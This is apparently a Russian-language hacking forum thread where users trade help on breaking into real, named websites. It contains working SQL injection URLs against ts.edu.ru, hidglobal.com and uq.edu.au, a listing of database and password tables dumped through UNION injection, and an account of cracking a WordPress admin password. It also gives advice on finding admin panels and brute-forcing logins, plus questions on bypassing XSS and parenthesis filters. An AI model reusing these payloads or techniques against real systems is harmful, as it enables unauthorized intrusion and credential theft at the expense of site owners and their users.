Вопрос по XSS Возсожно ли организовать уязвимость в поле color: у style ? Фильтр " не пропускает, а если сделать так \"\ то получается такое PHP: <span style="color:\"">1</span>
Всем здрастье Вот перебрал всю таблицу а пасы ненашол http://ts.edu.ru/schools/region/6/?town=%27+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(%27%20DBSchool%27,%27school_Need%27,%27school_News%27,%27school_Photo%27,%27school_Teachers%27,%27School_Leavers%27,%27index_Epigraph%27,%27index_bgImage%27,%27site_news%27,%27SchoolTypes%27,%27blag_News%27,%27SchoolForms%27,%27vote_Main%27,%27SchoolVids%27,%27v_FullSchoolInfo%27,%27vote_Answers%27,%27Regions%27,%27TownTypes%27,%27school_Main%27,%27%D0%E0%F1%EF%F0%E5%E4%E5%EB%E5%ED%E8%E5%20%F8%EA%EE%EB%20%EF%EE%20%F0%E5%E3%E8%EE%ED%E0%EC%27,%27Images%27,%27tmpImages%27,%27HelpTypes%27,%27Forums%27,%27school_History%27,%27sponsor_offers%27,%27Countries%27,%27Educations%27,%27Users%27,%27syssegments%27,%27sysconstraints%27,%27Admin_schools%27,%27dtproperties%27,%27Admin_Site%27,%27v_School_Need_Full%27,%27v_Sponsor_Offers_Full%27))--
2 IIAPTUZAH Cочуствую зы: а в Users\Admin_Site разве ничего нет?? как вариант - тут нет админки\пассы не в этой базе
в админ сайт токо user_id прочитал это:http://forum.antichat.ru/thread30501.html Но там по дркгому и я непонял как извлекать инфу Обясните
Вобщем столкнулся с интересным сайтом =) либо я где то ошибаюсь либо все так и есть! Вобщем есть SQL вот тут: hidglobal.com/pr.php?id=-1000+UNION+SELECT+1,2,version(),4,5,6,7-- Версия mysql выше 5 и с помощью SIPT4 я прочитал бд(вот самое интересное): Database [admin] Table [administrators ( Rows)] username password Database [blogpriv] Table [wp_users ( Rows)] ID user_login user_pass user_nicename user_email user_url user_registered user_activation_key user_status display_name Database [event_breakouts] Table [admin ( Rows)] admin_id admin_name admin_pwd Database [hid_productselector] Table [hid_administrator ( Rows)] administrator_username administrator_password нашел админку блога(вордпресс) /blog/wp_login.php из бд прочитал пасс, сбрутил его, ввел, а он не подходит =) и больше ничего из админок не нашел! =\ только еще что то order.hidglobal.com но и тут неудача =\ помогите разобраться, а то уже голова кругом идет
Gorev ошибся в написании... вот это второй адресс что я нашел но толку ноль! =\ не подходит ничего или я уже ошибаюсь где то! =\
там много бд, на хосте не один сайт=> вывод напрашивается сам собой тащи пароли с table_schema=version()
l1ght сейчас гляну еще раз... через 2ip когда смотрел он сказал что всего 3 сайта там =) сейчас перепроверю Проверил 3 сайта лан буду сейчас еще копаться может что найду
Kraneg, http://www.hidglobal.com/admin/ - доступ запрещен, значит там что то есть интересное аля админка. Поищи. https://orders.hidcorp.com/ - тут похоже авторизация по .htaccess, значит или брут или голяк. 2ip - часто меня подводит, он скорей как дополнительная помощь
Добрый день уважаемые Гуру и не только. Столкнулся с такой проблемой: http://www.uq.edu.au/news/emailpage.php?article=17208+order+by+4+--+&option=emailArticle 4 поля, судя по тому что || работает как конкатенация строк, то postgres sql. Как вы могли увидеть это форма для отправки ссылки на новость по e-mail. Сообщения приходят следующего содержания News Title : UQ academic seeks an end to genocide and mass atrocities News Date : 19-Jan-2009 News URL : http://www.uq.edu.au/news/index.html?article=17208 Поэтому есть подозрение что одно из 4 полей-дата, но успехов в составлении работоспособного запроса так и не добился(гребаный postgres), Но может вам это удастся лучше меня.
Люди,как обойти фильтрацию круглых скобок? ( () ).Чар и хекс отдыхают,но работают условия типа 1+and+1.= не фильтруется,но фильтруются все виды пробелов,кроме %2b ЗЫ: Скобки фильтруются потому,что не работают выражения типа (a-b).База данных вроде мускул,щас проверяю. Ещё вопрос: Выражение a%2bc (тобишь а+b) работает,а выражение 1%2band%2b1=1 - нет.Чем это объясняется ? В выражение order by + пашет.Group by отключен.Union select также не работает)